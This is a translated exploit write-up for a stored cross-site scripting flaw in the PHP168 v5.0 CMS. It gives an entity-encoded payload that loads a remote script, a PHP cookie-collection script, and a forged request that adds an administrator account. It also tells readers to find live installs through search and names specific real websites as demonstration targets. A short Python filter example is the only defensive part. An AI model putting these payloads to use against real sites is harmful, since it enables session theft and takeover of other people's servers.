(1) Software test environment and setup
Test environment: Local XAMPP 1.7.1
Test software: PHP168 full-site v5.0
Software download: http://down2.php168.com/v2008.rar
php.ini configuration: magic_quotes_gpc Off (On or Off does not affect persistent XSS); register_globals Off; safe_mode Off
(2) XSS cross-site basics
1. XSS attack definition
XSS, also known as CSS (Cross Site Script), is short for cross-site scripting. A malicious attacker inserts malicious HTML code into a web page; when a user browses that page, the embedded HTML code is executed in the user's browser and achieves the attacker's goal. XSS is a passive attack, and because it is passive and hard to exploit, many people overlook its harm. In fact, many systems have XSS vulnerabilities; this article mainly studies the exploitation of XSS in the PHP168 whole-site system.
2. How to Find XSS vulnerabilities
Generally, XSS attacks can be divided into two types. Internal attacks mainly refer to using a vulnerability in the program itself to construct cross-site statements, such as the cross-site vulnerability in showerror.asp of dvbbs. The other type is external attacks, which mainly refer to constructing a web page with an XSS vulnerability, or finding a page with a cross-site vulnerability on a machine other than the target. For example, when we want to penetrate a website, we construct a web page with a cross-site vulnerability and then construct the cross-site statements; combined with other techniques, such as social engineering, the administrator of the target server is tricked into opening it.
3. How to exploit
In traditional cross-site exploitation methods, attackers usually construct a cross-site web page and place a cookie-collecting page in another web space; then other techniques are used to get users to open the cross-site page, so that their cookies are stolen for further attacks. I personally think this method is too backward, and you may know its disadvantages: even if you collect cookies, you may not be able to penetrate further, because the passwords in most cookies are encrypted, and if you want to do cookie spoofing you are also subject to other conditions. The other idea proposed in this article solves the above problems to a certain extent. For me, a mature method is to construct a form through the cross-site flaw, where the content of the form uses the program's backup function or adds an administrator in order to obtain high privileges.
(3) Cross-site XSS
1. Obtain the XSS vulnerability address
XSS is also called cross-site scripting. There are two types: persistent and reflected. This article demonstrates persistent cross-site scripting and a simple exploitation of it. In fact, it builds on the work of our predecessors, and we are grateful to those experts for their selfless contribution. After installing php168, do not log in. Open the following URL: http://localhost/php168/member/post.php?job=postnew&fid=2
You can post an article directly without logging in, as shown in Figure 1.
Figure 1 direct posting without verification
Note:
If you are testing on the real Internet, you can search for "php168/member/post.php" as the keyword, open a search result, and view it, as shown in Figure 2; click the "post" link to enter the posting page. The fid obtained this way is a correct ID; otherwise the ID you obtain may not open the page, as shown in Figure 3. In the corresponding input boxes in Figure 3, enter the corresponding test values and publish. As shown in Figure 4, the post succeeds. Click "View" to look at the post you just published, as shown in Figure 5. The entire posting process requires neither review nor login.
Figure 2 search for php168 posting address
Figure 3 post directly
Figure 4 Post successful
Figure 5 view published posts
2. Test XSS
On the post page, select the "source code" mode and add the following code to the content:
Click "post". Let's look at the article URL: http://127.0.0.1/php168/bencandy.php?fid=2&aid=4
The malicious XSS pops up, as shown in Figure 6.
Figure 6 Finding the malicious XSS
3. Remote inclusion of JS files
We include a remote JS file for the attack. The code is as follows:
<img src="javascript:s=document.createElement('script');
s.src='http://127.0.0.1/xss.js';
document.body.appendChild(s);" />
Submitted like this, the code is filtered out, so it has to be encoded first; you can do the encoding directly with http://ha.ckers.org/xss.html?ipobfuscate.
The Code is as follows:
<img src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x73&#x3D&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x27script&#x27);
s.src='http://127.0.0.1/xss.js';
document.body.appendChild(s);" />
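The encoded payload gets past the filter because a check for the literal string "javascript:" never sees it once the scheme is written as numeric character references, which the browser decodes with or without the trailing semicolon. The following is an added illustration (not code from this write-up or from PHP168) of how a defensive check should canonicalise a src value the way a browser does before deciding on its scheme; the sample values are the write-up's payload plus a few constructed variants, and the function and constant names are my own.

```python
import re

# Sample src values: the write-up's plain payload, its entity-encoded form, and
# constructed variants (decimal references, an embedded tab, benign URLs).
PLAIN = "javascript:s=document.createElement('script');"
ENCODED = ("&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x73&#x3D"
           "&#x64&#x6F&#x63&#x75&#x6D&#x65&#x6E&#x74&#x2E&#x63&#x72&#x65&#x61"
           "&#x74&#x65&#x45&#x6C&#x65&#x6D&#x65&#x6E&#x74&#x28&#x27script&#x27);")
DECIMAL = "&#106;&#97;vascript:alert(1)"
TABBED = "jav\tascript:alert(1)"
BENIGN = "http://127.0.0.1/php168/images/logo.gif"
RELATIVE = "images/logo.gif"

_NUMERIC_REF = re.compile(r"&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?")


def naive_filter_blocks(value):
    """A literal substring check: the kind of filter the encoded payload bypasses."""
    return "javascript:" in value.lower()


def decode_numeric_refs(value):
    """Decode numeric character references as browsers do: hex or decimal, with
    the trailing semicolon optional. A decoder that insists on the semicolon
    would leave the write-up's payload untouched and therefore "clean"."""
    def repl(m):
        cp = int(m.group(1), 16) if m.group(1) else int(m.group(2))
        return chr(cp) if cp < 0x110000 else ""
    return _NUMERIC_REF.sub(repl, value)


def url_scheme(value):
    """Return the scheme a browser would act on for this attribute value: decode
    references, strip the ASCII control/whitespace bytes browsers ignore inside
    a scheme, lowercase, then match the scheme grammar ("" if none)."""
    cleaned = re.sub(r"[\x00-\x20]", "", decode_numeric_refs(value))
    m = re.match(r"([a-z][a-z0-9+.-]*):", cleaned.lower())
    return m.group(1) if m else ""


def is_safe_src(value, allowed=("http", "https")):
    """Allow-list decision: only http(s) and scheme-less (relative) URLs pass."""
    scheme = url_scheme(value)
    return scheme == "" or scheme in allowed


if __name__ == "__main__":
    for name, v in [("PLAIN", PLAIN), ("ENCODED", ENCODED), ("DECIMAL", DECIMAL),
                    ("TABBED", TABBED), ("BENIGN", BENIGN), ("RELATIVE", RELATIVE)]:
        print(f"{name:8} naive_blocks={naive_filter_blocks(v)!s:5} "
              f"scheme={url_scheme(v) or '-':10} safe={is_safe_src(v)}")
```

Run as-is, the table shows the naive filter blocking only PLAIN, while the scheme check rejects all four javascript variants and accepts the two benign URLs.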
In this way, we can edit our xss.js file directly to fetch the administrator's cookie. Of course, there are other (reflected) variants as well. The execution result is shown in Figure 7.
Figure 7 XSS execution result
4. Get the cookie
Edit the js file as follows:
alert(document.cookie);
The local cookie value is displayed, as shown in Figure 8.
Figure 8 Obtaining the local cookie value
Of course, the part that phishes the administrator's cookie is hidden here, and we did not test it on the official website. Try it yourselves.
5. Write the code to collect the cookie, or directly add an administrator
Write a PHP file with the following code:
<?php
/* Author: menzhi007 Blog: http://hi.baidu.com/menzhi007 */
$txtfile = "menzhi.php";
$date = date("Y-m-d-H:i:s");
$cookie = $_GET['get'];
$writeinfo = "{$date} {$cookie}";
$printer = fopen($txtfile, "a"); // append mode; the mode argument was missing from the listing as extracted
fwrite($printer, $writeinfo);
fclose($printer);
?>
Or add the administrator directly. The code is as follows:
location.href="http://127.0.0.1/php168/admin/index.php?lfj=member&action=addmember&postdb%5Busername%5D=menzhi007&postdb%5Bpasswd%5D=menzhi007&postdb%5Bpasswd2%5D=menzhi007&postdb%5Bgroupid%5D=3&postdb%5Bemail%5D=menzhi007@163.com&Submit=%CC%E1%BD%BB";
I usually don't have time to get online, so test it yourselves. Official site path: D:\p8-server\wwwroot\php168_com
I have already notified the official team to fix the vulnerability. Do not use the vulnerability to cause damage (I regret it if I do not enter the official team).
(4) Live demonstration
Open the official homepage http://www.php168.com/biz/impower.php
The business authorization query lists sites using the system, as shown in Figure 9.
Figure 9 Obtaining users of the php168 whole-site system
Let's pick a few demonstration sites.
Demo site 1:
http://www.3cq.org/member/post.php?job=postnew&fid=2
Figure 10 Demonstration site 1
Demo site 2:
http://www.ccdv.cc/member/post.php?job=postnew&fid=2
Figure 11 Demonstration site 2